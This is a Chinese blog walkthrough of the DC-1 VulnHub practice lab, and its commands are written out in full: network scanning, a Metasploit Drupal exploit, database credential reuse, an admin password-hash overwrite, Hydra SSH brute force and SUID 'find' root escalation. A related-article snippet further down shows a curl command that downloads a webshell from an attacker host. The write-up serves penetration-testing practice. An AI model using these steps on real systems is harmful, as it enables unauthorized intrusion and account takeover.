【DC-1靶场渗透】

最新推荐文章于 2024-08-16 18:41:12 发布
最新推荐文章于 2024-08-16 18:41:12 发布
阅读量1k 收藏
点赞数
分类专栏: 靶场渗透 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/128891245
版权

文章目录

前言

本期讲解dc-1靶机渗透过程

一.信息收集

1.主机发现

nmap -sP 192.168.1.0/24 //扫描自己网段存活的主机

2.端口扫描

nmap -sT -p- --min-rate 2000 192.168.1.8

在这里插入图片描述
发现开放了22,80等知名端口

二.查找漏洞

1.登陆页面


可以看到内容管理系统版本drupal 7
由此可尝试查看有无可利用的漏洞

2.msf利用

searchsploit drupal


msfconsole
search drupal 7.x
use 0
show options
set rhosts 192.168.1.8
run


在这里插入图片描述

3.获取flag1

shell
python -c 'import pty;pty.spawn("/bin/bash")'

4.获取flag2

查找可疑文件
在sites/default/default.setting.php中找到flag2

可以看到给出了数据库用户名和密码
可以登录数据库看看

三.登录数据库

1.修改admin密码

mysql -udbuser -pR0ck3t
show databases;
use drupaldb;
show tables;
slect * from users;

在这里插入图片描述
生成自定义的哈希密码进行修改

php scripts/password-hash.sh password


update users set pass="$s$DRYYqPjar/0Po8UWLFN0II/0.77dz7Q16YQXvyaB6cl0EJr6vEIy" where uid=1;

2.登录获取flag3

四.ssh爆破

1.查看敏感文件


可以看到有flag4用户,并且可以登录,但是不知道密码,尝试爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.8 ssh

2.ssh登录

ssh flag4@192.168.1.8

3.获取flag4

在这里插入图片描述

五.提权

1.SUID位提权

find / -user root -perm -4000 -print 2>/dev/null //查找具有suid位的命令

2.登录网站查询

查询提权命令网站

find . -exec /bin/sh \; -quit

3.获取最终的flag

在这里插入图片描述

总结

多打靶机熟悉技能

一纸-荒芜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 535
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
DC-1靶机渗透
applekelly的博客
03-28 95
主机扫描,扫描主机IP查看靶机mac地址,从而查询IP22端口和80端口是我们的突破口,访问网页查看站点信息,也可以自行判断,网页一看就是cms就是drupal也可以用kalli自带的工whatweb扫描可以扫出cms,然后再用dirb工具扫一下网站目录还是扫出了很多目录,咱们先放一放暂时得到了以下信息CMS是Drupal Apache 2.2.22PHP 5.4.45。
kali对CTF靶场进行渗透测试找flag
勤能补拙
05-09 1488
kali Linux做攻击机渗透测试CTF靶场找flag
DC1-9靶机提权总结
问彡心的博客
09-27 1719
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2917
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
DC-1靶机渗透测试
来日可期的博客
08-04 1886
SH文件大多是用于程序开发人员,这些文件都是Bash的应用程序非常重要,因为该应用程序主要使用脚本以及命令将被执行,使这个应用程序的工作。CMS:Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到高度赞赏,Drupal可以作为开源软件免费使用,就是附带了cms的php开发框架。:/etc/passwd文件,系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读(r)操作。命令的选项之一,用于指定要搜索的文件名为 "flag4.txt"。
DC-1靶机渗透
weixin_62485906的博客
06-23 1304
关于kali渗透DC-1靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
网络渗透CTF实践:获取靶机Web Developer 文件/root/flag.txt中flag
yellowO的博客
12-27 4604
实验目的:通过对目标靶机渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。(Dirb 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑)截图。利用该插件可能存在的漏洞。pwd查看当前所在的目录,cd切换到/var/www/html目录下,ls查看当前目录下的内容,找到wp-config.php文件。
渗透入门:DC-1主机渗透详细教学
2301_77472496的博客
09-19 1154
DC系列靶场是一组专门为渗透测试而设计的易受攻击的实验室,共有九个靶场。它的目的是让初学者获得渗透测试领域的经验,但是它的难度取决于你的技能和知识,以及你的学习能力。
[渗透测试][Kali]对DC-1靶机进行渗透测试
多皮哦的博客
07-15 3667
1.搭建渗透平台 2.准备工作 3.扫描端口 4.使用msfconsole扫描网站目录 5.在msfconsole中查询并尝试针对Drupal的工具 6.数据库操作 7.从网页登陆admin账户 8. 得到flag3之后的操作 9. 使用find命令提升权限
DC-1靶机实战和分析
weixin_48202759的博客
08-31 944
前言 我们都知道,对靶机渗透,可以宽阔自己的解题思路,练习并熟悉相关操作命令,提高自己的能力。下面我就对Vulnhub的DC-1靶机进行渗透靶机设置了5个flag,咱们依次找到它。并通过图文形式讲解涉及到的相关知识点。DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 目标机IP地址:198.162.9.138 攻击机kali IP地址:198.132.9.129 目标探测 渗透测试的第一步,是信息收集,这一步很重要,关系到后面的渗透步骤。下面我们对
[Vulnhub] DC-1靶机渗透
weixin_45605352的博客
08-03 225
0x00 环境搭建 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了22端口(SSH服务)、80端口(HTTP服务)、111端口和57345端口(RPC服务) 0x02 web渗透 访问80端口 ...
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 290
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值